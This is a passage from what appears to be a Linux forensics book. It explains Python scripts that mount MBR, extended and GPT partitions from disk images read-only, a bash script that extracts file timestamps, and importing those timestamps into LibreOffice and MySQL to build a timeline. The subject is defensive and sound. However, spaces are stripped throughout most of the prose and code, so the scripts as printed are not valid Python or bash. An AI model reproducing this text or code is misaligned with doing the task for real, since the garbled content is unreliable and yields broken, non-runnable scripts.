createsalistcontainingthefourpartitionentries.NoticethatIsaidlinenotlines.The“\”attheendofthefirstlineisalinecontinuationcharacter.ThisisusedtomakethingsmorereadablewithoutviolatingPython’sindentationrules.

AtthispointImustconfesstoawhitelieItoldearlierinthischapter.Pythondoesnothavearrays.Rather,Pythonhastwothingsthatlooklikearrays:listsandtuples.Tocreatea list inPython simplyenclose the list items in squarebrackets and separate themwithcommas. The list we have described here is mutable (its values can be changed).Enclosing items in parentheses creates a tuple which is used in the same way, but isimmutable.Somereadersmaybefamiliarwitharraysinother languages.Unlikearrays,itemsinalistortuplecanbeofdifferenttypesinPython.

Oncewehavethelistofpartitions,weiterateoverthelistinthefollowingforloop:forpinparts:

p.printPart()

ifnotp.empty:

notsupParts=[0x05,0x0f,0x85,0x91,0x9b,0xc5,0xe4,0xee]

ifp.typeinnotsupParts:

print(“SorryGPTandextendedpartitions“+\

“arenotsupportedbythisscript!”)

else:

mountpath=‘/media/part%s’%str(p.partno)

#iftheappropriatedirectorydoesn’texistcreateit

ifnotos.path.isdir(mountpath):

subprocess.call([‘mkdir’,mountpath])

mountopts=‘loop,ro,noatime,offset=%s’%str(p.start*512)

subprocess.call([‘mount’,‘-o’,mountopts,sys.argv[1],mountpath])

Let’s break down thisfor loop. The lineforpinparts: starts a for loopblock.ThiscausesthePythoninterpretertoiterateoverthepartslistsettingthevariablepto point to the current item in parts with each iteration. We start by printing out thepartitionentryusingp.printPart(). If the entry is not emptyweproceedwithourattemptstomountit.

Wecreateanotherlist,notsupParts,andfillitwithpartitiontypesthatarenotsupportedby thisscript.Next,wecheck tosee if thecurrentpartition’s type is in the listwithifp.typeinnotsupParts:.Ifitisinthelist,weprintasorrymessage.Otherwise(else:)wecontinuewithourmountingprocess.

Thelinemountpath=‘/media/part%s’%str(p.partno)usesapopularPython construct to build a string. The general format of this construct is “somestringcontainingplaceholders”%<listortupleofstrings>.For example, ‘Hello %s, My name is %s’ % (‘Bob’, ‘Phil’) wouldevaluate to the string ‘Hello Bob, My name is Phil’. The line in our code causesmountpath to be assigned the value of ‘/media/part0’, ‘/media/part1’, ‘/media/part2’, or‘/media/part3’.

Thelineifnotos.path.isdir(mountpath):checksfortheexistenceofthismountpathdirectory. If it doesn’t exist it is createdon thenext line.Thenext lineusessubprocess.call()tocallanexternalprogramorcommand.Thisfunctionexpectsalistcontainingtheprogramtoberunandanyarguments.

On thenext line the string substitutionconstruct isusedonceagain to create a stringwith options for the mount command complete with the appropriate offset. Note thatstr(p.start*512)isusedtofirstcomputethisoffsetandthenconvertitfromanumeric value to a string as required by the % operator. Finally, we usesubprocess.call()torunthemountcommand.

Onlyone thingremains in thescript that requiresexplanation,and that is the last twolines.Thetestif__name__==“__main__”: isacommontrickused inPythonscripting. If the script is executed the variable __name__ is set to “__main__”. If,however,thescriptismerelyimportedthisvariableisnotset.ThisallowsthecreationofPythonscriptsthatcanbothberunandimportedintootherscripts(therebyallowingcodetobereused).

If you are new to Python youmightwant to take a break at this point afterwalkingthroughourfirstscript.Youmightwanttorereadthissectionifyouarestillabituncertainabouthowthisscriptworks.Restassuredthatthingswillbeabiteasieraswepressonanddevelopnewscripts.

The results of running our script against an image file from aWindows system areshowninFigure5.12.Figure5.13depictswhathappenswhenrunningthescriptagainstanimagefromanUbuntu14.04system.

FIGURE5.12

RunningthePythonmountingscriptagainstanimagefilefromaWindowssystem.

FIGURE5.13

RunningthePythonmountingscriptagainstanimagefilefromanUbuntu14.04system.

MBR-basedextendedpartitionsThe following script will attempt to mount anything in extended partitions that wereskippedoverinthepreviousscript:#!/usr/bin/python

#

#mount-image-extpart.py

#

#ThisisasimplePythonscriptthatwill

#attempttomountpartitionsinsideanextended

#partitionfromanimagefile.

#Imagesaremountedread-only.

#

#DevelopedbyDr.PhilPolstra(@ppolstra)

#forPentesterAcademy.com

importsys

importos.path

importsubprocess

importstruct

“””

ClassMbrRecord:decodesapartitionrecordfromaMasterBootRecord

Usage:rec=MbrRecord(sector,partno)where

sectoristhe512byteorgreatersectorcontainingtheMBR

partnoisthepartitionnumber0-3ofinterest

rec.printPart()printspartitioninformation

“””

classMbrRecord():

def__init__(self,sector,partno):

self.partno=partno

#firstrecordatoffset446&recordsare16bytes

offset=446+partno*16

self.active=False

#firstbyte==0x80meansactive(bootable)

ifsector[offset]==‘\x80’:

self.active=True

self.type=ord(sector[offset+4])

self.empty=False

#partitiontype==0meansitisempty

ifself.type==0:

self.empty=True

#sectorvaluesare32-bitandstoredinlittleendianformat

self.start=struct.unpack(‘<I’,sector[offset+8:\

offset+12])[0]

self.sectors=struct.unpack(‘<I’,sector[offset+12:\

offset+16])[0]

defprintPart(self):

ifself.empty==True:

print(“<empty>”)

else:

outstr=“”

ifself.active==True:

outstr+=“Bootable:”

outstr+=“Type“+str(self.type)+“:”

outstr+=“Start“+str(self.start)+“:”

outstr+=“Totalsectors“+str(self.sectors)

print(outstr)

defusage():

print(“usage“+sys.argv[0]+“<imagefile>\n”+\

“Attemptstomountextendedpartitionsfromanimagefile”)

exit(1)

defmain():

iflen(sys.argv)<2:

usage()

#onlyextendedpartitionswillbeprocessed

extParts=[0x05,0x0f,0x85,0x91,0x9b,0xc5,0xe4]

#swappartionswillbeignored

swapParts=[0x42,0x82,0xb8,0xc3,0xfc]

#readfirstsector

ifnotos.path.isfile(sys.argv[1]):

print(“File“+sys.argv[1]+“cannotbeopenedforreading”)

exit(1)

withopen(sys.argv[1],‘rb’)asf:

sector=str(f.read(512))

if(sector[510]==“\x55”andsector[511]==“\xaa”):

print(“LookslikeaMBRorVBR”)

#ifitisanMBRbytes446,462,478,and494mustbe0x80or0x00

if(sector[446]==‘\x80’orsector[446]==‘\x00’)and\

(sector[462]==‘\x80’orsector[462]==‘\x00’)and\

(sector[478]==‘\x80’orsector[478]==‘\x00’)and\

(sector[494]==‘\x80’orsector[494]==‘\x00’):

print(“MustbeaMBR”)

parts=[MbrRecord(sector,0),MbrRecord(sector,1),\

MbrRecord(sector,2),MbrRecord(sector,3)]

forpinparts:

p.printPart()

ifnotp.empty:

#ifitisn’tanextendedpartitionignoreit

ifp.typeinextParts:

print(“Foundanextendedpartitionatsector%s”\

%str(p.start))

bottomOfRabbitHole=False

extendPartStart=p.start

extPartNo=5

whilenotbottomOfRabbitHole:

#getthelinkedlistMBRentry

withopen(sys.argv[1],‘rb’)asf:

f.seek(extendPartStart*512)

llSector=str(f.read(512))

extParts=[MbrRecord(llSector,0),

MbrRecord(llSector,1)]

#tryandmountthefirstpartition

ifextParts[0].typeinswapParts:

print(“Skippingswappartition”)

else:

mountpath=‘/media/part%s’%str(extPartNo)

ifnotos.path.isdir(mountpath):

subprocess.call([‘mkdir’,mountpath])

mountopts=‘loop,ro,noatime,offset=%s’\

%str((extParts[0].start+extendPartStart)*512)

print(“Attemptingtomountextendparttype%sat

sector%s”\

%(hex(extParts[0].type),\

str(extendPartStart+extParts[0].start)))

subprocess.call([‘mount’,‘-o’,mountopts,\

sys.argv[1],mountpath])

ifextParts[1].type==0:

bottomOfRabbitHole=True

print(“Foundthebottomoftherabbithole”)

else:

extendPartStart+=extParts[1].start

extPartNo+=1

if__name__==“__main__”:

main()

This script starts out very similar to the previous script until we get into the mainfunction.Thefirstdifferenceisthedefinitionoftwolists:extPartsandswapPartsthatlistextendedpartitionandswappartitiontypes,respectively.WethenreadtheMBRasbeforeand verify that it looks like an MBR should. Things really start to diverge from thepreviousscriptatthefollowinglines:ifp.typeinextParts:

print(“Foundanextendedpartitionatsector%s”\

%str(p.start))

bottomOfRabbitHole=False

extendPartStart=p.start

extPartNo=5

Intheselineswechecktoseeifwehavefoundanextendedpartition.Ifsoweprintamessageandsetafewvariables.ThefirstvariablenamedbottomOfRabbitHole isset tofalse.Thisvariable isused to indicatewhenwehave found the lowest level in a setofnestedextendedpartitions.Thestartsectorof theprimaryextendedpartitionisstoredinextendPartStart. This is necessary because addresses inside an extended partition arerelativetotheextendedpartition,butweneedabsoluteaddressestomountthepartition(s).Finally,wesetavariableextPartNoequalto5whichistraditionallyusedasthepartitionnumberforthefirstlogicalpartitionwithinanextendedpartition.

ThelinewhilenotbottomOfRabbitHole:beginsawhileloop.Awhileloopisexecutedaslongastheconditionlistedinthewhileloopistrue.Withinthewhileloopwe use ourwithopen construct as before to read themini-MBR at the start of theextended partition with one small addition to the previous script. The linef.seek(extendPartStart*512)isnew.Becausethemini-MBRisnotlocatedatthestartofthefile(LBA0)wemustseekaheadtotheappropriateplace.Theoffsetweneedisjustthesectornumbermultipliedbythesizeofasector(512).

Nextwereadthefirsttwoentriesinthemini-MBRintoalist,extParts.Ifthefirstentry(extParts[0]) is a swap partition, we skip it. Otherwise we attempt to mount it. Themountingcodeisthesameasthatfoundinthepreviousscript.

Wethencheckthesecondentryinthemini-MBR(extParts[1]).Ifitstypeis0x00,thereare no nested extended partitions and we are done. If this is not the case we add thestartingsectorofthenestedextendedpartitiontoextendPartStartandincrementextPartNosothingsaresetupproperlyforournextiterationofthewhileloop.

GPTpartitionsNowthatwehavecoveredsystemsusingthelegacyMBR-basedmethodofpartition,let’smoveontoGUID-basedpartitions.Hopefullywithinthenextfewyearsthiswillbecometheonlysystemyouhavetohandleduringyourinvestigations.AsIsaidpreviously,thisnew system is much more straightforward and elegant. Our script for automaticallymountingthesepartitionsfollows.#!/usr/bin/python

#

#mount-image-gpt.py

#

#ThisisasimplePythonscriptthatwill

#attempttomountpartitionsfromanimagefile.

#ThisscriptisforGUIDpartitionsonly.

#Imagesaremountedread-only.

#

#DevelopedbyDr.PhilPolstra(@ppolstra)

#forPentesterAcademy.com

importsys

importos.path

importsubprocess

importstruct

#GUIDsforsupportedpartitiontypes

supportedParts=[“EBD0A0A2-B9E5-4433-87C0-68B6B72699C7”,

“37AFFC90-EF7D-4E96-91C3-2D7AE055B174”,

“0FC63DAF-8483-4772-8E79-3D69D8477DE4”,

“8DA63339-0007-60C0-C436-083AC8230908”,

“933AC7E1-2EB4-4F13-B844-0E14E2AEF915”,

“44479540-F297-41B2-9AF7-D131D5F0458A”,

“4F68BCE3-E8CD-4DB1-96E7-FBCAF984B709”,

“B921B045-1DF0-41C3-AF44-4C6F280D3FAE”,

“3B8F8425-20E0-4F3B-907F-1A25A76F98E8”,

“E6D6D379-F507-44C2-A23C-238F2A3DF928”,

“516E7CB4-6ECF-11D6-8FF8-00022D09712B”,

“83BD6B9D-7F41-11DC-BE0B-001560B84F0F”,

“516E7CB5-6ECF-11D6-8FF8-00022D09712B”,

“85D5E45A-237C-11E1-B4B3-E89A8F7FC3A7”,

“516E7CB4-6ECF-11D6-8FF8-00022D09712B”,

“824CC7A0-36A8-11E3-890A-952519AD3F61”,

“55465300-0000-11AA-AA11-00306543ECAC”,

“516E7CB4-6ECF-11D6-8FF8-00022D09712B”,

“49F48D5A-B10E-11DC-B99B-0019D1879648”,

“49F48D82-B10E-11DC-B99B-0019D1879648”,

“2DB519C4-B10F-11DC-B99B-0019D1879648”,

“2DB519EC-B10F-11DC-B99B-0019D1879648”,

“49F48DAA-B10E-11DC-B99B-0019D1879648”,

“426F6F74-0000-11AA-AA11-00306543ECAC”,

“48465300-0000-11AA-AA11-00306543ECAC”,

“52414944-0000-11AA-AA11-00306543ECAC”,

“52414944-5F4F-11AA-AA11-00306543ECAC”,

“4C616265-6C00-11AA-AA11-00306543ECAC”,

“6A82CB45-1DD2-11B2-99A6-080020736631”,

“6A85CF4D-1DD2-11B2-99A6-080020736631”,

“6A898CC3-1DD2-11B2-99A6-080020736631”,

“6A8B642B-1DD2-11B2-99A6-080020736631”,

“6A8EF2E9-1DD2-11B2-99A6-080020736631”,

“6A90BA39-1DD2-11B2-99A6-080020736631”,

“6A9283A5-1DD2-11B2-99A6-080020736631”,

“75894C1E-3AEB-11D3-B7C1-7B03A0000000”,

“E2A1E728-32E3-11D6-A682-7B03A0000000”,

“BC13C2FF-59E6-4262-A352-B275FD6F7172”,

“42465331-3BA3-10F1-802A-4861696B7521”,

“AA31E02A-400F-11DB-9590-000C2911D1B8”,

“9198EFFC-31C0-11DB-8F78-000C2911D1B8”,

“9D275380-40AD-11DB-BF97-000C2911D1B8”,

“A19D880F-05FC-4D3B-A006-743F0F84911E”]

#simplehelpertoprintGUIDs

#notethattheyarebothlittle/bigendian

defprintGuid(packedString):

iflen(packedString)==16:

outstr=format(struct.unpack(‘<L’,\

packedString[0:4])[0],‘X’).zfill(8)+“-”+\

format(struct.unpack(‘<H’,\

packedString[4:6])[0],‘X’).zfill(4)+“-”+\

format(struct.unpack(‘<H’,\

packedString[6:8])[0],‘X’).zfill(4)+“-”+\

format(struct.unpack(‘>H’,\

packedString[8:10])[0],‘X’).zfill(4)+“-”+\

format(struct.unpack(‘>Q’,\

“\x00\x00”+packedString[10:16])[0],‘X’).zfill(12)

else:

outstr=“<invalid>”

returnoutstr

“””

ClassGptRecord

ParsesaGUIDPartitionTableentry

Usage:rec=GptRecord(recs,partno)

whererecsisastringcontainingall128GPTentries

andpartnoisthepartitionnumber(0-127)ofinterest

rec.printPart()printspartitioninformation

“””

classGptRecord():

def__init__(self,recs,partno):

self.partno=partno

offset=partno*128

self.empty=False

#buildpartitiontypeGUIDstring

self.partType=printGuid(recs[offset:offset+16])

ifself.partType==\

“00000000-0000-0000-0000-000000000000”:

self.empty=True

self.partGUID=printGuid(recs[offset+16:offset+32])

self.firstLBA=struct.unpack(‘<Q’,\

recs[offset+32:offset+40])[0]

self.lastLBA=struct.unpack(‘<Q’,\

recs[offset+40:offset+48])[0]

self.attr=struct.unpack(‘<Q’,\

recs[offset+48:offset+56])[0]

nameIndex=recs[offset+56:offset+128].find(‘\x00\x00’)

ifnameIndex!=-1:

self.partName=\

recs[offset+56:offset+56+nameIndex].encode(‘utf-8’)

else:

self.partName=\

recs[offset+56:offset+128].encode(‘utf-8’)

defprintPart(self):

ifnotself.empty:

outstr=str(self.partno)+“:”+self.partType+\

“:”+self.partGUID+“:”+str(self.firstLBA)+\

“:”+str(self.lastLBA)+“:”+\

str(self.attr)+“:”+self.partName

print(outstr)

“””

ClassMbrRecord:decodesapartitionrecordfromaMasterBootRecord

Usage:rec=MbrRecord(sector,partno)where

sectoristhe512byteorgreatersectorcontainingtheMBR

partnoisthepartitionnumber0-3ofinterest

rec.printPart()printspartitioninformation

“””

classMbrRecord():

def__init__(self,sector,partno):

self.partno=partno

#firstrecordatoffset446&recordsare16bytes

offset=446+partno*16

self.active=False

#firstbyte==0x80meansactive(bootable)

ifsector[offset]==‘\x80’:

self.active=True

self.type=ord(sector[offset+4])

self.empty=False

#partitiontype==0meansitisempty

ifself.type==0:

self.empty=True

#sectorvaluesare32-bitandstoredinlittleendianformat

self.start=struct.unpack(‘<I’,sector[offset+8:\

offset+12])[0]

self.sectors=struct.unpack(‘<I’,sector[offset+12:\

offset+16])[0]

defprintPart(self):

ifself.empty==True:

print(“<empty>”)

else:

outstr=“”

ifself.active==True:

outstr+=“Bootable:”

outstr+=“Type“+str(self.type)+“:”

outstr+=“Start“+str(self.start)+“:”

outstr+=“Totalsectors“+str(self.sectors)

print(outstr)

defusage():

print(“usage“+sys.argv[0]+\

“<imagefile>\nAttemptstomountpartitionsfromanimagefile”)

exit(1)

defmain():

iflen(sys.argv)<2:

usage()

#readfirstsector

ifnotos.path.isfile(sys.argv[1]):

print(“File“+sys.argv[1]+“cannotbeopennedforreading”)

exit(1)

withopen(sys.argv[1],‘rb’)asf:

sector=str(f.read(512))

if(sector[510]==“\x55”andsector[511]==“\xaa”):

#ifitisanMBRbytes446,462,478,and494mustbe0x80or0x00

if(sector[446]==‘\x80’orsector[446]==‘\x00’)and\

(sector[462]==‘\x80’orsector[462]==‘\x00’)and\

(sector[478]==‘\x80’orsector[478]==‘\x00’)and\

(sector[494]==‘\x80’orsector[494]==‘\x00’):

part=MbrRecord(sector,0)

ifpart.type!=0xee:

print(“FailedprotectiveMBRsanitycheck”)

exit(1)

#checktheheaderasanothersanitycheck

withopen(sys.argv[1],‘rb’)asf:

f.seek(512)

sector=str(f.read(512))

ifsector[0:8]!=“EFIPART”:

print(“YouappeartobemissingaGUIheader”)

exit(1)

print(“ValidprotectiveMBRandGUIpartiontableheaderfound”)

withopen(sys.argv[1],‘rb’)asf:

f.seek(1024)

partRecs=str(f.read(512*32))

parts=[]

foriinrange(0,128):

p=GptRecord(partRecs,i)

ifnotp.empty:

p.printPart()

parts.append(p)

forpinparts:

ifp.partTypeinsupportedParts:

print(“Partition%sseemstobesupportedattemptingtomount”\

%str(p.partno))

mountpath=‘/media/part%s’%str(p.partno)

ifnotos.path.isdir(mountpath):

subprocess.call([‘mkdir’,mountpath])

mountopts=‘loop,ro,noatime,offset=%s’%\

str(p.firstLBA*512)

subprocess.call([‘mount’,‘-o’,mountopts,\

sys.argv[1],mountpath])

if__name__==“__main__”:

main()

Let’swalkthroughthiscode.Itbeginswith thenormalshe-bang.Thenweimport thesamefourlibrariesasinthepreviousscripts.Nextwedefineaverylonglistofsupportedpartitiontypes.Asyoucanseefromthislist,Linuxsupportsmostanypartitiontype.

WedefineasimplehelperfunctiontoprinttheGUIDsfromthepackedstringsusedtostoretheGPTentriesontheselines:defprintGuid(packedString):

iflen(packedString)==16:

outstr=format(struct.unpack(‘<L’,\

packedString[0:4])[0],‘X’).zfill(8)+“-”+\

format(struct.unpack(‘<H’,\

packedString[4:6])[0],‘X’).zfill(4)+“-”+\

format(struct.unpack(‘<H’,\

packedString[6:8])[0],‘X’).zfill(4)+“-”+\

format(struct.unpack(‘>H’,\

packedString[8:10])[0],‘X’).zfill(4)+“-”+\

format(struct.unpack(‘>Q’,\

“\x00\x00”+packedString[10:16])[0],‘X’).zfill(12)

else:

outstr=“<invalid>”

returnoutstr

This helper function uses the samestruct.unpackmethod found in the previousscripts.Onedifferenceisthatthefirst threepartsoftheGUIDarestoredinlittleendianformat and the last two are big endian. That is why the first three calls tostruct.unpackhave‘<’intheirformatstringsandthelasttwohave‘>’.Also,thelastcalltounpackmightlookabitstrange.AllthatI’vedonehereisaddtwobytesofleadingzerostothevaluebecausethereisnounpackformatspecifierfora6-bytevalue,butthereisoneforan8-bytevalue.

We have introduced a new function, format, in this helper function. As the nameimplies,format is used to print values in a specified way. Our chosen format, ‘X’,specifieshexadecimalwithuppercaseletters.Oncewehaveastringcontainingourvaluewe runzfill() on the string to add leading zeros in order for our GUIDs to printcorrectly. As a simple example, the expression format(struct.unpack(‘<L’,‘\x04\x00\x00\x00’)[0], ‘X’).zfill(8) evaluates to the string“00000004”.

Next we define a GptRecord class that acts just like the MbrRecord class from thepreviousscripts.Itexpectsalistofpartitiontableentries(all128ofthem)andanindexintothetableasinputs.Onlythefollowinglinesrequireanyexplanationinthisclass:nameIndex=recs[offset+56:offset+128].find(‘\x00\x00’)

ifnameIndex!=-1:

self.partName=\

recs[offset+56:offset+56+nameIndex].encode(‘utf-8’)

else:

self.partName=\

recs[offset+56:offset+128].encode(‘utf-8’)

Whyare these lineshere? Ihave found that sometimesUnicodestringssuchas thoseusedtostorethepartitionnameintheGPTarenull-terminated(with0x000x00)andtheremay be random junk after the terminating null character. The first line in this codefragmentusesfindtoseeifthereisanullcharacterinthename.Ifthestringisfound,thennameIndexissettoitsposition.Ifthestringisnotfound,thefindfunctionreturns-1.Lookingattheifblockyouwillseethatifanullwasfound,weonlyusecharactersbeforeittostorethepartitionname.Otherwisewestoreallofthename.

TheMbrRecord class still hasn’t gone away.This class is used to read theprotectiveMBRasasanitycheck.Youwillseethatthemainfunctionstartsoutthesameasbeforeby reading the first sector and using MbrRecord to parse it. The second sanity checkcausesthescripttoexitifthefirstpartitionisnottype0xEE,whichindicatesaGPTdrive.

The third sanity check reads theGPTheader in the second sector and checks for thestring“EFIPART”whichshouldbestoredinthefirsteightbytesofthissector.Ifthisfinalcheck passes, the image is reopened and the next 32 sectors containing the 128 GPTentriesareread.

Wethenhaveanewkindofforloopinthiscode:foriinrange(0,128):

p=GptRecord(partRecs,i)

ifnotp.empty:

p.printPart()

parts.append(p)

Nowinsteadofiteratingoveralistortupleweareusinganexplicitrangeofnumbers.Itturnsoutthatwearestilliteratingoveratuple.Therange(n,m)functioninPythoncreatesatuple(immutablelist)ofintegersintherange[n,m).Thisiswhatiscommonlycalledahalfopenrange.Thenisincludedintherange(hence‘[‘onthatend)andthemisnot(asdenotedby‘)’onthatend).Forexample,range(0,5)evaluatestothetuple(0,1,2,3,4).Non-emptypartitionsareprintedandadded to theparts list.YoumaybewonderingwhyIdon’tstoponceanemptyrecordhasbeenencountered.Itisvalid,thoughsomewhatunusual,tohaveemptyentriesinthemiddleoftheGPT.

OncetheentireGPThasbeenparsedweiterateoverthepartslistandattempttomountany supported partitions. The methods used are the same as those from the previousmounting scripts. The results of running this script against an image using GUIDpartitionsisshowninFigure5.14.Notethatthisscriptwasintentionallyrunwithoutrootprivilegessothatthemountswouldfailastheimageusedwascorrupted.

FIGURE5.14

Mounting GUID-based partitions from an image file. Note: the script was intentionally run without rootprivilegestopreventmountingofanimagethatwascorrupted.

SUMMARYWe have covered a lot of ground in this chapter.We discussed the basics ofmountingdifferenttypesofpartitionsfoundinimagefiles.SomereadersmayhavelearnedalittlePython along the ways as we discussed how Python could be used to automate thisprocess.Inthenextchapterwewilldiscussinvestigatingthefilesystem(s)mountedfromyourdiskimage.

CHAPTER

6AnalyzingMountedImagesINFORMATIONINTHISCHAPTER:

GettingmetadatafromanimageUsingLibreOfficeinaninvestigationUsingMySQLinaninvestigationCreatingtimelinesExtractingbashhistoriesExtractingsystemlogsExtractingloginsandloginattempts

GETTINGMODIFICATION,ACCESS,ANDCREATIONTIMESTAMPSNowthatyouhavean imagemounted, the full setofLinuxsystemtools isavailable toyou.Oneofthefirstthingsyoumightwanttodoiscreateatimeline.Ataminimumyouwillwanttocheckalloftheusualdirectoriesthatattackerstargetsuchas/sbinand/bin.Naturally,wecanstillusesomescripting tohelpwith theprocess.The followingscriptwill extractmodification, access, and creation (MAC) times and othermetadata from agivendirectoryandoutputtheinformationinsemicolonseparatedvaluesforeasyimportintoaspreadsheetordatabase.#!/bin/bash

#

#getmacs.sh

#

#SimpleshellscripttoextractMACtimesfromanimageto

#aCSVfileforimportintoaspreadsheetordatabase.

#

#DevelopedforPentesterAcademyby

#Dr.PhilPolstra(@ppolstra)

usage(){

echo“usage:$0<startingdirectory>”

echo“SimplescripttogetMACtimesfromanimageandoutputCSV”

exit1

}

if[$#-lt1];then

usage

fi

#semicolondelimitedfilewhichmakesimporttospreadsheeteasier

#printfisaccessdate,accesstime,modifydate,modifytime,

#createdate,createtime,permissions,userid,username,

#groupid,groupname,filesize,filenameandthenlinefeed

olddir=$(pwd)

cd$1#thisavoidshavingthemountpointaddedtoeveryfilename

printf“AccessDate;AccessTime;ModifyDate;ModifyTime;CreateDate;\

CreateTime;Permissions;UserID;GroupID;FileSize;Filename\n”

find./-printf“%Ax;%AT;%Tx;%TT;%Cx;%CT;%m;%U;%G;%s;%p\n”

cd$olddir

Thescriptisstraightforwardandcontainsnonewtechniquespreviouslyundiscussedinthisbook.Theonethingyoumightbecuriousaboutissavingthecurrentdirectorywitholddir=$(pwd),changingtothespecifieddirectory,andthenchangingbackwithcd$olddir at the end. This is done to prevent the full path (including themount pointspecified)frombeingaddedtothefrontofeachfilenameintheoutput.

Partial resultsof running this scriptagainsta subject systemareshown inFigure6.1.Normally youwill want to capture the results to a file usinggetmacs.sh {mountpoint of subject filesystem} > {output file}. For example,getmacs.sh/media/part0>pfe1.csv.

FIGURE6.1

Gettingmetadataforinputtoaspreadsheetordatabase.

IMPORTINGINFORMATIONINTOLIBREOFFICETheoutput from theprevious script is easily imported intoLibreOfficeCalcor anotherspreadsheet.Simplyopen thesemicolon-separated file.Youwillneed tospecifywhat isusedtoseparatethevalues(asemicolonforus)andshouldalsoselecttheformatusedforthedatecolumnsasshowninFigure6.2.

FIGURE6.2

Importing a semicolon-seperated file into LibreOffice. Note that the date columns should be formatted asdatesasshown.

Thespreadsheetiseasilysortedbyanyofthedatesandtimes.Tosortthespreadsheetselect the columns to be sorted and then select sort from the data menu. You will begreetedwithascreensuchasthatshowninFigure6.3.

FIGURE6.3

Sortingthespreadsheetbyaccesstimes.

Afterwehavesortedthespreadsheetitismucheasiertoseerelatedactivities,oratleastthefilesthathavebeenaccessedaroundthesametime,possiblyrelatedtoactionsbyanattacker.Thehighlightedrows inFigure6.4showarootkit thatwasdownloadedby thejohnaccountbeingaccessed.

FIGURE6.4

Aftersortingthespreadsheetbyaccesstimesthedownloadandinstallationofarootkitiseasilyseen.

IMPORTINGDATAINTOMySQLImportingourdataintoaspreadsheetisaneasyprocess.Itdoessufferwhenitcomestoperformanceifthesubjectfilesystemislarge,however.Thereisanotherlimitationofthismethod aswell. It is not easy tomake a true timelinewheremodification, access, andcreationtimesareallpresentedonasingletimeline.YoucouldcreateabodyfileforusewithAutopsy,butIhavefoundthattheperformanceisstilllackingandthisisnotnearlyasflexibleashavingeverythinginaproperdatabase.

IfyoudonotalreadyhaveMySQLinstalledonyour forensicsworkstation, it isquitesimple to add. For Debian and Ubuntu based systems sudo apt-get installmysql-servershouldbeallyouneed.OnceMySQLhasbeeninstalledyouwillwantto create a database.Tokeep things clean, I recommendyou create a newdatabase foreachcase.Thecommandtocreateanewdatabaseissimplymysqladmin-u<user>-pcreate<databasename>. For example, if I want to login as the root user(whichisnotnecessarilythesameastherootuseronthesystem)andcreateadatabaseforcase-pfe1Iwouldtypemysqladmin-uroot-pcreatecase-pfe1.The-poptionmeanspleasepromptmeforapassword(passingitinonthecommandlinewouldbeverybadsecurityasthiscouldbeinterceptedeasily).TheuserlogininformationshouldhavebeensetupwhenMySQLwasinstalled.

Onceadatabasehasbeencreatedit is timetoaddsometables.TheeasiestwaytodothisistostarttheMySQLclientusingmysql-u<user>-p,i.e.mysql-uroot-p. You are not yet connected to your database. To remedy that situation issue thecommandconnect<database>intheMySQLclientshell.Forexample,inmycaseI would type connect case-pfe1. Logging in to MySQL and connecting to adatabaseisshowninFigure6.5.

FIGURE6.5

LogginginwiththeMySQLclientandconnectingtoadatabase.

The following SQL codewill create a database table that can be used to import thesemicolon-separated values in the file generated by our shell script. This scriptmay besavedtoafileandexecutedintheMySQLclient.ItisalsojustaseasytocutandpastitintoMySQL.createtablefiles(

AccessDatedatenotnull,

AccessTimetimenotnull,

ModifyDatedatenotnull,

ModifyTimetimenotnull,

CreateDatedatenotnull,

CreateTimetimenotnull,

Permissionssmallintnotnull,

UserIdsmallintnotnull,

GroupIdsmallintnotnull,

FileSizebigintnotnull,

Filenamevarchar(2048)notnull,

recnobigintnotnullauto_increment,

primarykey(recno)

);

Wecanseethatthisisafairlysimpletable.Allofthecolumnsaredeclared‘notnull’meaning that they cannot be empty. For readers not familiarwithMySQL the last two

linesmightrequiresomeexplanation.Thefirstcreatesacolumn,recno,whichisa longintegerandsetsittoautomaticallyincrementaninternalcountereverytimeanewrowisinserted.On the next line recno is set as the primary key. The primary key is used forsortingandquicklyretrievinginformationinthetable.

CreatingthistableisshowninFigure6.6.NoticethatMySQLreports0rowsaffectedwhichiscorrect.Addingatabledoesnotcreateanyrows(records)init.

FIGURE6.6

CreateaTabletostorefilemetadatainMySQL.

Now that there is aplace fordata togo, the information fromour shell script canbeimported. MySQL has a load data infile command that can be used for thispurpose. There is a small complication that must be worked out before running thiscommand.Thedatestrings in the filemustbeconverted toproperMySQLdateobjectsbefore insertion in the database. This is what is happening in the set clause of thefollowingscript.Thereisalsoalinethatreadsignore1rowswhichtellsMySQLtoignoretheheadersatthetopofourfilethatexisttomakeaspreadsheetimporteasier.loaddatainfile‘/tmp/case-pfe1.csv’

intotablefiles

fieldsterminatedby‘;’

enclosedby‘”’

linesterminatedby‘\n’

ignore1rows

(@AccessDate,AccessTime,@ModifyDate,ModifyTime,@CreateDate,\

CreateTime,Permissions,UserId,GroupId,FileSize,Filename)

setAccessDate=str_to_date(@AccessDate,“%m/%d/%Y”),

ModifyDate=str_to_date(@ModifyDate,“%m/%d/%Y”),

CreateDate=str_to_date(@CreateDate,“%m/%d/%Y”);

ThefiletobeimportedmustbeinanapproveddirectoryorMySQLwillignoreit.Thisisasecuritymeasure.Thiswouldprevent,amongotherthings,anattackerwhoexploitsaSQL vulnerability on a website from uploading a file to be executed, assuming thatMySQL won’t accept files from any directory accessible by the webserver. You couldchange the listofdirectories in theMySQLfiles,but it isprobablysimpler to justcopyyourfileto/tmpfortheimportasIhavedone.

LoadingfilemetadatafromthePFEsubjectsystemisshowninFigure6.7.Noticethatmylaptopwasabletoinsert184,601rowsinonly5.29seconds.Thewarningsconcernthedateimports.Asweshallsee,allofthedateswereproperlyimported.

FIGURE6.7

LoadingfilemetadataintoMySQL.

Oncethedataisimportedyouarefreetoqueryyouronetabledatabasetoyourheart’scontent.Forexample,togetthese184,601filessortedbyaccesstimeindescendingorder(so the latest activity is on the top) simply run the queryselect*fromfilesorderbyaccessdatedesc,accesstimedesc;.TheresultsofrunningthisqueryareshowninFigure6.8.Notethatretrieving184,601sortedrowsrequiredamere0.71 secondsonmy laptop. Ifyouprefer anascending sort justomit ‘desc’ in theSQLqueryabove.

FIGURE6.8

UsingMySQLtosortfilemetadatabyaccesstime.

